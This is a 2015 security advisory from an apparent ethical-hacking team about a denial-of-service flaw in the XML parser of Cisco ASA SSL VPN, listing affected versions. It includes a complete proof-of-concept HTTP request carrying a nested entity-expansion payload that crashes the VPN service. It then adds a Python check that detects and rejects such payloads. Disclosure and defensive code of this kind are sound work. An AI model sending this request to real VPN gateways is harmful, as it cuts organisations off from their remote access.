Cisco ASA VPN XML Parser Denial of Service Vulnerability
9/22/2015

The AEC team of ethical hackers discovered and reported a serious vulnerability in Cisco systems.

Relevance: High
Abuse Difficulty: Low

The identified vulnerability is caused by an error in the XML (Extensible Markup Language) parser, a software component of WebVPN in Cisco ASA products. It can be abused with a specially crafted set of XML entities sent remotely by an unauthenticated attacker. Successful abuse leads to the disconnection of all established SSL VPN connections, system instability, and a restart. There is a real risk of a long-lasting effect of the attack, and of the affected company being unable to use its VPN (Virtual Private Network) for an extended period.

Vulnerable systems

Cisco ASA devices configured for Clientless or AnyConnect SSL VPN, or for AnyConnect IKEv2 VPN.

These versions of the Cisco ASA software are vulnerable:

  • Cisco ASA Software 8.4 prior to 8.4(7.28)
  • Cisco ASA Software 8.6 prior to 8.6(1.17)
  • Cisco ASA Software 9.0 prior to 9.0(4.32)
  • Cisco ASA Software 9.1 prior to 9.1(6)
  • Cisco ASA Software 9.2 prior to 9.2(3.4)
  • Cisco ASA Software 9.3 prior to 9.3(3)

The vulnerability was reported to Cisco. Out of respect for our customers, we decided to publish the full details only after a period long enough to ensure an appropriate level of remediation in the companies we protect.

Recommendation by AEC

Mitigation measures at the network level and in upstream systems are not effective. If you use a software version older than those stated above, contact your system supplier and ask for a patch.

More details are available at the official Cisco links below:
http://tools.cisco.com/security/center/viewAlert.x?alertId=38185
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150408-asa

Proof of Concept

Below we show an example of a request that successfully abuses the vulnerability and makes the service unavailable. The request was modified to maintain anonymity.

HTTP request:

POST / HTTP/1.1
X-Transcend-Version: 1
X-Aggregate-Auth: 1
X-AnyConnect-Platform: win
X-Transcend-Version: 1
X-Aggregate-Auth: 1
X-AnyConnect-Platform: win
Host: VPN_SERVER_NAME
Cookie: sdesktop=4168B38548AE90FC768A2DEF;
User-Agent: AnyConnect Windows 3.1.05152
Content-Length: 907
Connection: Close
Cache-Control: no-cache
Pragma: no-cache

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [
<!ENTITY xxx "test">
<!ENTITY xxx1 "&xxx;&xxx;&xxx;&xxx;&xxx;&xxx;&xxx;&xxx;&xxx;&xxx;">
<!ENTITY xxx2 "&xxx1;&xxx1;&xxx1;&xxx1;&xxx1;&xxx1;&xxx1;&xxx1;&xxx1;&xxx1;">
<!ENTITY xxx3 "&xxx2;&xxx2;&xxx2;&xxx2;&xxx2;&xxx2;&xxx2;&xxx2;&xxx2;&xxx2;">
<!ENTITY xxx4 "&xxx3;&xxx3;&xxx3;&xxx3;&xxx3;&xxx3;&xxx3;&xxx3;&xxx3;&xxx3;">
<!ENTITY xxx5 "&xxx4;&xxx4;&xxx4;&xxx4;&xxx4;&xxx4;&xxx4;&xxx4;&xxx4;&xxx4;">
<!ENTITY xxx6 "&xxx5;&xxx5;&xxx5;&xxx5;&xxx5;&xxx5;&xxx5;&xxx5;&xxx5;&xxx5;">
<!ENTITY xxx7 "&xxx6;&xxx6;&xxx6;&xxx6;&xxx6;&xxx6;&xxx6;&xxx6;&xxx6;&xxx6;">
<!ENTITY xxx8 "&xxx7;&xxx7;&xxx7;&xxx7;&xxx7;&xxx7;&xxx7;&xxx7;&xxx7;&xxx7;">
<!ENTITY xxx9 "&xxx8;&xxx8;&xxx8;&xxx8;&xxx8;&xxx8;&xxx8;&xxx8;&xxx8;&xxx8;">
]>

<config-auth client="vpn" type="auth-reply" aggregate-auth-version="2">
<test>&xxx9;</test>
</config-auth>

After the above request is sent to a vulnerable service, the VPN service becomes unavailable and the current SSL VPN connections are disconnected.
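The payload above is a nested-entity expansion: nine levels of entities, each referencing the previous one ten times, so a single &xxx9; reference expands to four billion bytes. As an added example (not part of the AEC advisory or of Cisco's code), the following Python check computes the expanded size of a request body from its internal DTD alone, so an XML endpoint can reject such a body before any parser expands it. The sample request is constructed after the proof of concept, and the expansion limit and all function names are assumptions of this example.

```python
import re
ENTITY_DECL = re.compile(r'<!ENTITY\s+(\w+)\s+(?:"([^"]*)"|\'([^\']*)\')\s*>')
ENTITY_REF = re.compile(r'&(\w+);')
MAX_EXPANSION_BYTES = 1_000_000  # constructed policy limit for this example
# Sample constructed after the advisory's proof of concept: nine entity
# levels, each referencing the previous level ten times (4 * 10**9 bytes).
SAMPLE_DTD = '<!ENTITY xxx "test">\n' + ''.join(
    '<!ENTITY xxx%d "%s">\n' % (i, ('&xxx%s;' % ('' if i == 1 else i - 1)) * 10)
    for i in range(1, 10))
SAMPLE_REQUEST = ('<?xml version="1.0" encoding="utf-8"?>\n<!DOCTYPE test [\n'
                  + SAMPLE_DTD + ']>\n<config-auth client="vpn" type="auth-reply">'
                  '<test>&xxx9;</test></config-auth>')


def entity_expansion_sizes(xml_text):
    """Map each internal general entity to its fully expanded length.
    Computed symbolically, so nothing is expanded; recursion yields inf."""
    decls = {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
             for m in ENTITY_DECL.finditer(xml_text)}
    sizes = {}

    def size_of(name, stack):
        if name in sizes:
            return sizes[name]
        if name in stack:                 # entity refers back to itself
            return float('inf')
        value = decls.get(name)
        if value is None:                 # undeclared/predefined: stays literal
            return len('&%s;' % name)
        total = len(ENTITY_REF.sub('', value))   # literal characters
        for ref in ENTITY_REF.findall(value):
            total += size_of(ref, stack | {name})
        sizes[name] = total
        return total

    for name in decls:
        size_of(name, frozenset())
    return sizes


def body_expansion_size(xml_text):
    """Length of the document body once every entity reference is resolved."""
    sizes = entity_expansion_sizes(xml_text)
    dtd_end = xml_text.find(']>')
    body = xml_text[dtd_end + 2:] if dtd_end != -1 else xml_text
    total = len(ENTITY_REF.sub('', body))
    for ref in ENTITY_REF.findall(body):
        total += sizes.get(ref, len('&%s;' % ref))
    return total


def should_reject(xml_text, limit=MAX_EXPANSION_BYTES):
    # Gate to run on a request body before it reaches the real XML parser.
    return body_expansion_size(xml_text) > limit
```

Recursive entity definitions are reported as an infinite size and therefore rejected as well; a benign document with a small internal DTD passes unchanged.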